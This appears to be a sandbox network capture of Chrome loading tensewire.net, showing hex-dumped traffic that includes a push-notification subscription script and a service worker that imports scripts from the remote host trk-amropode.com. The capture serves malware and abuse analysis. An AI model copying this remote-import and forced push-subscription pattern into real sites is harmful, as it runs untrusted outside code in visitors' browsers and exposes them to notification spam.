                              Connection: keep-alive
                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                              sec-ch-ua-mobile: ?0
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                              sec-ch-ua-platform: "Windows"
                              Accept: */*
                              Sec-Fetch-Site: cross-site
                              Sec-Fetch-Mode: no-cors
                              Sec-Fetch-Dest: script
                              Referer: https://tensewire.net/
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en;q=0.9
                              2024-04-25 18:22:15 UTC1342INHTTP/1.1 200 OK
                              Date: Thu, 25 Apr 2024 18:22:15 GMT
                              Content-Type: application/javascript;charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: close
                              expires: 0
                              Cache-Control: max-age=14400, must-revalidate
                              x-xss-protection: 1; mode=block
                              pragma: no-cache
                              x-frame-options: SAMEORIGIN
                              referrer-policy: strict-origin-when-cross-origin
                              content-security-policy: default-src 'self'; frame-src 'self' data:; connect-src 'self' https://cdn-media-2020.s3.amazonaws.com; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://storage.googleapis.com; style-src 'self' 'unsafe-inline'; img-src * 'self' https://* blob: data:; font-src 'self' data:
                              vary: Origin
                              vary: Access-Control-Request-Method
                              vary: Access-Control-Request-Headers
                              x-content-type-options: nosniff
                              permissions-policy: camera=(), fullscreen=(self), geolocation=(), gyroscope=(), magnetometer=(), microphone=(), midi=(), payment=(), sync-xhr=()
                              CF-Cache-Status: HIT
                              Age: 5814
                              Last-Modified: Thu, 25 Apr 2024 16:45:21 GMT
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8DJLP8ZFBQo6bRyJUCkO7fsYXqOeyWO3pJReh7RH%2B8Sgm0plFf%2BgJYjTCfMRswb39hkw7YKSBMA0QzXdh9WNr7IHlTOHo%2Fk7E04t9lHslqfSGl44Tq0klF3FWH%2BJVYkpzX8%2B"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              2024-04-25 18:22:15 UTC62INData Raw: 43 46 2d 52 41 59 3a 20 38 37 61 30 35 62 38 31 39 62 61 38 34 35 38 32 2d 41 54 4c 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                              Data Ascii: CF-RAY: 87a05b819ba84582-ATLalt-svc: h3=":443"; ma=86400
                              2024-04-25 18:22:15 UTC1334INData Raw: 31 63 39 61 0d 0a 27 75 73 65 20 73 74 72 69 63 74 27 3b 63 6f 6e 73 74 20 73 6d 50 75 73 68 41 70 70 6c 69 63 61 74 69 6f 6e 53 65 72 76 65 72 50 75 62 6c 69 63 4b 65 79 3d 22 42 4a 62 75 6a 74 4b 49 6d 6b 69 4c 57 6a 6c 57 6b 4d 47 59 4d 6f 32 5f 73 4d 30 61 6c 32 34 4b 6f 53 37 55 36 54 4a 31 55 37 73 4b 4a 61 78 6c 49 55 4c 7a 35 73 36 70 37 74 4e 36 57 62 6e 4c 69 73 43 71 5f 53 69 35 68 50 37 58 30 37 36 39 54 76 50 44 46 54 51 3d 22 2c 73 6d 50 75 73 68 53 69 74 65 49 64 3d 22 76 39 65 31 31 38 6d 65 7a 38 22 2c 73 6d 43 6c 69 65 6e 74 49 64 3d 22 71 32 67 6f 79 6b 6a 64 72 76 22 2c 73 65 72 76 69 63 65 57 6f 72 6b 65 72 3d 22 2f 73 65 72 76 69 63 65 2d 77 6f 72 6b 65 72 2e 6a 73 22 3b 6c 65 74 20 73 6d 50 75 73 68 44 6f 6d 61 69 6e 3d 22 70 75 73
                              Data Ascii: 1c9a'use strict';const smPushApplicationServerPublicKey="BJbujtKImkiLWjlWkMGYMo2_sM0al24KoS7U6TJ1U7sKJaxlIULz5s6p7tN6WbnLisCq_Si5hP7X0769TvPDFTQ=",smPushSiteId="v9e118mez8",smClientId="q2goykjdrv",serviceWorker="/service-worker.js";let smPushDomain="pus
                              2024-04-25 18:22:15 UTC1369INData Raw: 65 5f 6f 6e 65 29 2c 61 2e 73 6f 75 72 63 65 54 77 6f 3d 73 65 74 49 66 4e 75 6c 6c 28 75 74 6d 4f 62 6a 2e 73 6f 75 72 63 65 5f 74 77 6f 2c 62 2e 73 6f 75 72 63 65 5f 74 77 6f 29 2c 61 2e 73 6f 75 72 63 65 54 68 72 65 65 3d 73 65 74 49 66 4e 75 6c 6c 28 75 74 6d 4f 62 6a 2e 73 6f 75 72 63 65 5f 74 68 72 65 65 2c 62 2e 73 6f 75 72 63 65 5f 74 68 72 65 65 29 2c 61 2e 73 6f 75 72 63 65 46 6f 75 72 3d 73 65 74 49 66 4e 75 6c 6c 28 75 74 6d 4f 62 6a 2e 73 6f 75 72 63 65 5f 66 6f 75 72 2c 62 2e 73 6f 75 72 63 65 5f 66 6f 75 72 29 2c 61 2e 73 6f 75 72 63 65 46 69 76 65 3d 73 65 74 49 66 4e 75 6c 6c 28 75 74 6d 4f 62 6a 2e 73 6f 75 72 63 65 5f 66 69 76 65 2c 62 2e 73 6f 75 72 63 65 5f 66 69 76 65 29 2c 61 2e 73 6f 75 72 63 65 4f 6e 65 3d 73 65 74 49 66 4e 75 6c
                              Data Ascii: e_one),a.sourceTwo=setIfNull(utmObj.source_two,b.source_two),a.sourceThree=setIfNull(utmObj.source_three,b.source_three),a.sourceFour=setIfNull(utmObj.source_four,b.source_four),a.sourceFive=setIfNull(utmObj.source_five,b.source_five),a.sourceOne=setIfNul
                              2024-04-25 18:22:15 UTC1369INData Raw: 72 76 69 63 65 20 57 6f 72 6b 65 72 20 45 72 72 6f 72 22 2c 61 29 2c 22 52 65 67 69 73 74 72 61 74 69 6f 6e 20 66 61 69 6c 65 64 20 2d 20 70 65 72 6d 69 73 73 69 6f 6e 20 64 65 6e 69 65 64 22 3d 3d 3d 61 2e 6d 65 73 73 61 67 65 3f 22 64 65 66 61 75 6c 74 22 3d 3d 3d 4e 6f 74 69 66 69 63 61 74 69 6f 6e 2e 70 65 72 6d 69 73 73 69 6f 6e 3f 6c 6f 67 50 75 73 68 45 76 65 6e 74 28 22 63 6c 6f 73 65 64 5f 70 72 6f 6d 70 74 22 2c 61 2e 74 6f 53 74 72 69 6e 67 28 29 2c 76 65 72 73 69 6f 6e 29 3a 6c 6f 67 50 75 73 68 45 76 65 6e 74 28 22 62 6c 6f 63 6b 65 64 22 2c 61 2e 74 6f 53 74 72 69 6e 67 28 29 2c 76 65 72 73 69 6f 6e 29 3a 6c 6f 67 50 75 73 68 45 76 65 6e 74 28 22 6f 74 68 65 72 5f 65 72 72 6f 72 22 2c 61 2e 74 6f 53 74 72 69 6e 67 28 29 2c 76 65 72 73 69 6f
                              Data Ascii: rvice Worker Error",a),"Registration failed - permission denied"===a.message?"default"===Notification.permission?logPushEvent("closed_prompt",a.toString(),version):logPushEvent("blocked",a.toString(),version):logPushEvent("other_error",a.toString(),versio
                              2024-04-25 18:22:15 UTC1369INData Raw: 6e 28 62 29 7b 69 66 28 21 62 29 7b 63 6f 6e 73 74 20 62 3d 75 72 6c 42 61 73 65 36 34 54 6f 55 69 6e 74 38 41 72 72 61 79 28 73 6d 50 75 73 68 41 70 70 6c 69 63 61 74 69 6f 6e 53 65 72 76 65 72 50 75 62 6c 69 63 4b 65 79 29 3b 72 65 74 75 72 6e 20 61 2e 70 75 73 68 4d 61 6e 61 67 65 72 2e 73 75 62 73 63 72 69 62 65 28 7b 75 73 65 72 56 69 73 69 62 6c 65 4f 6e 6c 79 3a 21 30 2c 61 70 70 6c 69 63 61 74 69 6f 6e 53 65 72 76 65 72 4b 65 79 3a 62 7d 29 7d 7d 29 2e 63 61 74 63 68 28 66 75 6e 63 74 69 6f 6e 28 61 29 7b 63 6f 6e 73 6f 6c 65 2e 65 72 72 6f 72 28 22 53 65 72 76 69 63 65 20 57 6f 72 6b 65 72 20 45 72 72 6f 72 22 2c 61 29 2c 70 75 73 68 4c 6f 67 67 69 6e 67 26 26 22 52 65 67 69 73 74 72 61 74 69 6f 6e 20 66 61 69 6c 65 64 20 2d 20 70 65 72 6d 69 73
                              Data Ascii: n(b){if(!b){const b=urlBase64ToUint8Array(smPushApplicationServerPublicKey);return a.pushManager.subscribe({userVisibleOnly:!0,applicationServerKey:b})}}).catch(function(a){console.error("Service Worker Error",a),pushLogging&&"Registration failed - permis
                              2024-04-25 18:22:15 UTC1369INData Raw: 6e 74 65 6e 74 2d 74 79 70 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 22 7d 2c 62 6f 64 79 3a 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 65 29 7d 29 2e 63 61 74 63 68 28 66 75 6e 63 74 69 6f 6e 28 61 29 7b 63 6f 6e 73 6f 6c 65 2e 65 72 72 6f 72 28 22 4c 6f 67 20 45 72 72 6f 72 2c 20 65 72 72 6f 72 20 22 2c 61 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 70 75 73 68 5f 75 6e 73 75 62 73 63 72 69 62 65 28 29 7b 6e 61 76 69 67 61 74 6f 72 2e 73 65 72 76 69 63 65 57 6f 72 6b 65 72 2e 72 65 61 64 79 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 2e 70 75 73 68 4d 61 6e 61 67 65 72 2e 67 65 74 53 75 62 73 63 72 69 70 74 69 6f 6e 28 29 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 61 29 7b 63 6f 6e 73 6f 6c 65 2e
                              Data Ascii: ntent-type":"application/json"},body:JSON.stringify(e)}).catch(function(a){console.error("Log Error, error ",a)})}function push_unsubscribe(){navigator.serviceWorker.ready.then(function(a){return a.pushManager.getSubscription()}).then(function(a){console.
                              2024-04-25 18:22:15 UTC520INData Raw: 61 69 6e 4e 61 6d 65 28 61 29 7b 72 65 74 75 72 6e 20 61 2e 73 75 62 73 74 72 69 6e 67 28 61 2e 6c 61 73 74 49 6e 64 65 78 4f 66 28 22 2e 22 2c 61 2e 6c 61 73 74 49 6e 64 65 78 4f 66 28 22 2e 22 29 2d 31 29 2b 31 29 7d 66 75 6e 63 74 69 6f 6e 20 67 65 74 53 74 6f 72 65 28 61 29 7b 69 66 28 73 65 6c 66 2e 69 6e 64 65 78 65 64 44 42 29 7b 6c 65 74 20 62 3d 73 65 6c 66 2e 69 6e 64 65 78 65 64 44 42 2e 6f 70 65 6e 28 22 70 75 73 68 50 6c 61 74 46 6f 72 6d 44 62 22 2c 32 29 3b 62 2e 6f 6e 65 72 72 6f 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 22 65 72 72 6f 72 20 64 62 22 2b 62 2e 65 72 72 6f 72 29 2c 61 28 6e 75 6c 6c 29 7d 2c 62 2e 6f 6e 73 75 63 63 65 73 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6c 65 74 20 63 3d 62 2e 72 65 73
                              Data Ascii: ainName(a){return a.substring(a.lastIndexOf(".",a.lastIndexOf(".")-1)+1)}function getStore(a){if(self.indexedDB){let b=self.indexedDB.open("pushPlatFormDb",2);b.onerror=function(){console.log("error db"+b.error),a(null)},b.onsuccess=function(){let c=b.res
                              2024-04-25 18:22:15 UTC5INData Raw: 30 0d 0a 0d 0a
                              Data Ascii: 0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              29192.168.2.449771104.21.47.804435468C:\Program Files\Google\Chrome\Application\chrome.exe
                              TimestampBytes transferredDirectionData
                              2024-04-25 18:22:15 UTC724OUTPOST /3a36ef2959e87b2ca27c8f04b726a343 HTTP/1.1
                              Host: tensewire.net
                              Connection: keep-alive
                              Content-Length: 95
                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                              sec-ch-ua-platform: "Windows"
                              sec-ch-ua-mobile: ?0
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                              Content-Type: application/x-www-form-urlencoded
                              Accept: */*
                              Origin: https://tensewire.net
                              Sec-Fetch-Site: same-origin
                              Sec-Fetch-Mode: cors
                              Sec-Fetch-Dest: empty
                              Referer: https://tensewire.net/3a36ef2959e87b2ca27c8f04b726a343
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en;q=0.9
                              Cookie: PHPSESSID=ee22049cb2431a7edf3dbdfcc8e5d0ef
                              2024-04-25 18:22:15 UTC95OUTData Raw: 5f 74 79 70 65 3d 61 6a 61 78 26 5f 61 63 74 69 6f 6e 3d 6d 61 73 74 65 72 2d 70 75 73 68 43 6f 75 6e 74 26 73 31 3d 33 35 30 33 35 39 26 73 32 3d 31 31 37 34 30 30 39 38 34 33 26 66 70 3d 33 61 33 36 65 66 32 39 35 39 65 38 37 62 32 63 61 32 37 63 38 66 30 34 62 37 32 36 61 33 34 33
                              Data Ascii: _type=ajax&_action=master-pushCount&s1=350359&s2=1174009843&fp=3a36ef2959e87b2ca27c8f04b726a343
                              2024-04-25 18:22:16 UTC810INHTTP/1.1 200 OK
                              Date: Thu, 25 Apr 2024 18:22:16 GMT
                              Content-Type: application/json
                              Transfer-Encoding: chunked
                              Connection: close
                              expires: Thu, 19 Nov 1981 08:52:00 GMT
                              Cache-Control: no-store, no-cache, must-revalidate
                              pragma: no-cache
                              vary: Accept-Encoding,User-Agent,User-Agent
                              x-frame-options: SAMEORIGIN
                              x-xss-protection: 1; mode=block
                              x-content-type-options: nosniff
                              alt-svc: h3=":443"; ma=86400
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6pW3fRRpM7zFGAgDYz0%2BihYb4uqOrKMraC8nHVgEi%2FArcSL37KHyyFP7gCdCoqIs5YZ3obCjr7GxaaC4TAvCghr3bZ53IfEydZ6WiGRVu%2BrJNza64M1OUzZ3D5ZrjCEE"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 87a05b864e56450f-ATL
                              2024-04-25 18:22:16 UTC31INData Raw: 31 39 0d 0a 7b 22 6e 6f 74 69 66 79 22 3a 5b 5d 2c 22 64 61 74 61 22 3a 74 72 75 65 7d 0d 0a
                              Data Ascii: 19{"notify":[],"data":true}
                              2024-04-25 18:22:16 UTC5INData Raw: 30 0d 0a 0d 0a
                              Data Ascii: 0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              30192.168.2.449772104.21.47.804435468C:\Program Files\Google\Chrome\Application\chrome.exe
                              TimestampBytes transferredDirectionData
                              2024-04-25 18:22:16 UTC677OUTGET /assets/images/ci21.jpg HTTP/1.1
                              Host: tensewire.net
                              Connection: keep-alive
                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                              sec-ch-ua-mobile: ?0
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                              sec-ch-ua-platform: "Windows"
                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                              Sec-Fetch-Site: same-origin
                              Sec-Fetch-Mode: no-cors
                              Sec-Fetch-Dest: image
                              Referer: https://tensewire.net/3a36ef2959e87b2ca27c8f04b726a343
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en;q=0.9
                              Cookie: PHPSESSID=ee22049cb2431a7edf3dbdfcc8e5d0ef
                              2024-04-25 18:22:16 UTC834INHTTP/1.1 200 OK
                              Date: Thu, 25 Apr 2024 18:22:16 GMT
                              Content-Type: image/jpeg
                              Content-Length: 2003
                              Connection: close
                              Cache-Control: public, max-age=604800
                              expires: Tue, 30 Apr 2024 14:33:44 GMT
                              last-modified: Tue, 03 Jan 2023 16:27:10 GMT
                              x-frame-options: SAMEORIGIN
                              x-xss-protection: 1; mode=block
                              x-content-type-options: nosniff
                              vary: User-Agent,User-Agent
                              alt-svc: h3=":443"; ma=86400
                              CF-Cache-Status: HIT
                              Age: 186512
                              Accept-Ranges: bytes
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AmlDgeTugagPHB9smYO8vuXowaFzc0HKAefKWNc4pBA%2Boo4EPJbxa%2FG9TL2w2ZpV5O%2BImZcEZeP25l6%2F4ZBEsnfclMaDLF9WF%2FeAz1NPy3mmqlg95RcjnFUqsNoxNR%2Bj"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 87a05b893ae11883-ATL
                              2024-04-25 18:22:16 UTC535INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 1e 00 00 ff e1 03 2f 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 39 2e 30 2d 63 30 30 30 20 37 39 2e 31 37 31 63 32 37 66 61 62 2c 20 32 30 32 32 2f 30 38 2f 31 36 2d 32 32 3a 33 35 3a 34 31 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46
                              Data Ascii: ExifII*Ducky/http://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c000 79.171c27fab, 2022/08/16-22:35:41 "> <rdf:RDF
                              2024-04-25 18:22:16 UTC1369INData Raw: 77 73 29 22 20 78 6d 70 4d 4d 3a 49 6e 73 74 61 6e 63 65 49 44 3d 22 78 6d 70 2e 69 69 64 3a 37 46 42 38 32 46 36 43 38 42 37 46 31 31 45 44 38 44 43 44 44 42 42 42 46 39 34 46 35 31 30 34 22 20 78 6d 70 4d 4d 3a 44 6f 63 75 6d 65 6e 74 49 44 3d 22 78 6d 70 2e 64 69 64 3a 37 46 42 38 32 46 36 44 38 42 37 46 31 31 45 44 38 44 43 44 44 42 42 42 46 39 34 46 35 31 30 34 22 3e 20 3c 78 6d 70 4d 4d 3a 44 65 72 69 76 65 64 46 72 6f 6d 20 73 74 52 65 66 3a 69 6e 73 74 61 6e 63 65 49 44 3d 22 78 6d 70 2e 69 69 64 3a 37 46 42 38 32 46 36 41 38 42 37 46 31 31 45 44 38 44 43 44 44 42 42 42 46 39 34 46 35 31 30 34 22 20 73 74 52 65 66 3a 64 6f 63 75 6d 65 6e 74 49 44 3d 22 78 6d 70 2e 64 69 64 3a 37 46 42 38 32 46 36 42 38 42 37 46 31 31 45 44 38 44 43 44 44 42 42 42
                              Data Ascii: ws)" xmpMM:InstanceID="xmp.iid:7FB82F6C8B7F11ED8DCDDBBBF94F5104" xmpMM:DocumentID="xmp.did:7FB82F6D8B7F11ED8DCDDBBBF94F5104"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:7FB82F6A8B7F11ED8DCDDBBBF94F5104" stRef:documentID="xmp.did:7FB82F6B8B7F11ED8DCDDBBB
                              2024-04-25 18:22:16 UTC99INData Raw: 2b 3e 06 5e a1 ec 69 aa f3 69 ae ea c6 ea bf 7f 3f 37 3a f3 72 f9 bb e8 a2 9e f8 3c f1 c9 83 36 93 6b a0 f9 3e 17 af 46 c3 ff 00 9b 8f f8 2b cb fc 23 e2 ec a2 8a e8 ea 6d f0 8c 1f d5 5f 75 87 cb f7 af f8 9c bb bb bb 6a 8a 7f ce 3a e8 35 d3 cd 45 15 9e c3 7d 65 4f cc e5 f8 7f 2d 14 51 42 29 ff d9
                              Data Ascii: +>^ii?7:r<6k>F+#m_uj:5E}eO-QB)


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              31192.168.2.449774104.21.47.804435468C:\Program Files\Google\Chrome\Application\chrome.exe
                              TimestampBytes transferredDirectionData
                              2024-04-25 18:22:16 UTC676OUTGET /assets/images/ci1.jpg HTTP/1.1
                              Host: tensewire.net
                              Connection: keep-alive
                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                              sec-ch-ua-mobile: ?0
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                              sec-ch-ua-platform: "Windows"
                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                              Sec-Fetch-Site: same-origin
                              Sec-Fetch-Mode: no-cors
                              Sec-Fetch-Dest: image
                              Referer: https://tensewire.net/3a36ef2959e87b2ca27c8f04b726a343
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en;q=0.9
                              Cookie: PHPSESSID=ee22049cb2431a7edf3dbdfcc8e5d0ef
                              2024-04-25 18:22:16 UTC830INHTTP/1.1 200 OK
                              Date: Thu, 25 Apr 2024 18:22:16 GMT
                              Content-Type: image/jpeg
                              Content-Length: 1990
                              Connection: close
                              Cache-Control: public, max-age=604800
                              expires: Tue, 30 Apr 2024 12:13:01 GMT
                              last-modified: Tue, 03 Jan 2023 16:27:10 GMT
                              x-frame-options: SAMEORIGIN
                              x-xss-protection: 1; mode=block
                              x-content-type-options: nosniff
                              vary: User-Agent,User-Agent
                              alt-svc: h3=":443"; ma=86400
                              CF-Cache-Status: HIT
                              Age: 194955
                              Accept-Ranges: bytes
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dRlSmnp0mH01G5plkFEbK0tKtglLGDzjSgYG2sjEnA37Ep30WUhxCS23xzjV6mfj%2BW7RhymeLmBZgsCuVWSAyYpyP%2FlpiI5AOZqw0QKTBcDUqr4l8K%2FcqkMr%2B34Ath1K"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 87a05b893dc0b050-ATL
                              2024-04-25 18:22:16 UTC539INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 1e 00 00 ff e1 03 2f 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 39 2e 30 2d 63 30 30 30 20 37 39 2e 31 37 31 63 32 37 66 61 62 2c 20 32 30 32 32 2f 30 38 2f 31 36 2d 32 32 3a 33 35 3a 34 31 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46
                              Data Ascii: ExifII*Ducky/http://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c000 79.171c27fab, 2022/08/16-22:35:41 "> <rdf:RDF
                              2024-04-25 18:22:16 UTC1369INData Raw: 20 78 6d 70 4d 4d 3a 49 6e 73 74 61 6e 63 65 49 44 3d 22 78 6d 70 2e 69 69 64 3a 34 41 31 37 36 37 41 33 38 42 38 30 31 31 45 44 38 31 37 41 44 45 42 39 39 41 32 37 44 39 37 39 22 20 78 6d 70 4d 4d 3a 44 6f 63 75 6d 65 6e 74 49 44 3d 22 78 6d 70 2e 64 69 64 3a 34 41 31 37 36 37 41 34 38 42 38 30 31 31 45 44 38 31 37 41 44 45 42 39 39 41 32 37 44 39 37 39 22 3e 20 3c 78 6d 70 4d 4d 3a 44 65 72 69 76 65 64 46 72 6f 6d 20 73 74 52 65 66 3a 69 6e 73 74 61 6e 63 65 49 44 3d 22 78 6d 70 2e 69 69 64 3a 34 41 31 37 36 37 41 31 38 42 38 30 31 31 45 44 38 31 37 41 44 45 42 39 39 41 32 37 44 39 37 39 22 20 73 74 52 65 66 3a 64 6f 63 75 6d 65 6e 74 49 44 3d 22 78 6d 70 2e 64 69 64 3a 34 41 31 37 36 37 41 32 38 42 38 30 31 31 45 44 38 31 37 41 44 45 42 39 39 41 32 37
                              Data Ascii: xmpMM:InstanceID="xmp.iid:4A1767A38B8011ED817ADEB99A27D979" xmpMM:DocumentID="xmp.did:4A1767A48B8011ED817ADEB99A27D979"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:4A1767A18B8011ED817ADEB99A27D979" stRef:documentID="xmp.did:4A1767A28B8011ED817ADEB99A27
                              2024-04-25 18:22:16 UTC82INData Raw: 4f 9d 3f 23 cf 26 7e 70 ff 00 db 3a bc 06 be 1f 4d 3a 5f fc 3c bd 3d 0d d7 d3 d2 7a b8 51 45 47 d4 da e8 73 8c 8f e1 a6 d7 f8 9b 3a 35 6c e1 4e 39 17 5c fa ba 07 56 af da e1 45 15 39 33 f5 27 1e 5e 87 3c ff 00 47 c5 fe 9f e2 a2 8a 29 81 3f ff d9
                              Data Ascii: O?#&~p:M:_<=zQEGs:5lN9\VE93'^<G)?


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              32192.168.2.449773104.21.47.804435468C:\Program Files\Google\Chrome\Application\chrome.exe
                              TimestampBytes transferredDirectionData
                              2024-04-25 18:22:16 UTC543OUTGET /service-worker.js HTTP/1.1
                              Host: tensewire.net
                              Connection: keep-alive
                              Cache-Control: max-age=0
                              Accept: */*
                              Service-Worker: script
                              Sec-Fetch-Site: same-origin
                              Sec-Fetch-Mode: same-origin
                              Sec-Fetch-Dest: serviceworker
                              Referer: https://tensewire.net/3a36ef2959e87b2ca27c8f04b726a343
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en;q=0.9
                              Cookie: PHPSESSID=ee22049cb2431a7edf3dbdfcc8e5d0ef
                              2024-04-25 18:22:16 UTC835INHTTP/1.1 200 OK
                              Date: Thu, 25 Apr 2024 18:22:16 GMT
                              Content-Type: application/javascript
                              Content-Length: 186
                              Connection: close
                              Cache-Control: public, max-age=604800
                              expires: Tue, 30 Apr 2024 13:44:53 GMT
                              last-modified: Mon, 22 May 2023 19:53:31 GMT
                              x-frame-options: SAMEORIGIN
                              x-xss-protection: 1; mode=block
                              x-content-type-options: nosniff
                              vary: User-Agent,User-Agent
                              alt-svc: h3=":443"; ma=86400
                              CF-Cache-Status: HIT
                              Age: 189443
                              Accept-Ranges: bytes
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kfWl3z4o3e7a6OiTdtt4RsnbgefzIX51rCLZdRrmUNfVnFgegs00R5i4U1AjCbPUQoDLJ8hsxyAH6yXi80EssOmwjfABv2kbwWVlIYX0foXpfhcd%2FpvGZQEUWQaEBGET"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 87a05b893b2017e7-ATL
                              2024-04-25 18:22:16 UTC186INData Raw: 2f 2f 20 67 65 6e 65 72 61 6c 0a 69 66 28 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 20 3d 3d 3d 20 27 75 6e 64 65 66 69 6e 65 64 27 29 7b 0a 20 20 20 20 20 20 20 20 69 6d 70 6f 72 74 53 63 72 69 70 74 73 28 27 68 74 74 70 73 3a 2f 2f 74 72 6b 2d 61 6d 72 6f 70 6f 64 65 2e 63 6f 6d 2f 2f 73 63 72 69 70 74 73 2f 70 67 2f 76 39 65 31 31 38 6d 65 7a 38 27 29 0a 7d 0a 69 6d 70 6f 72 74 53 63 72 69 70 74 73 28 27 68 74 74 70 73 3a 2f 2f 74 72 6b 2d 61 6d 72 6f 70 6f 64 65 2e 63 6f 6d 2f 2f 73 63 72 69 70 74 73 2f 73 77 2f 76 39 65 31 31 38 6d 65 7a 38 27 29 3b
                              Data Ascii: // generalif(typeof window === 'undefined'){ importScripts('https://trk-amropode.com//scripts/pg/v9e118mez8')}importScripts('https://trk-amropode.com//scripts/sw/v9e118mez8');


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
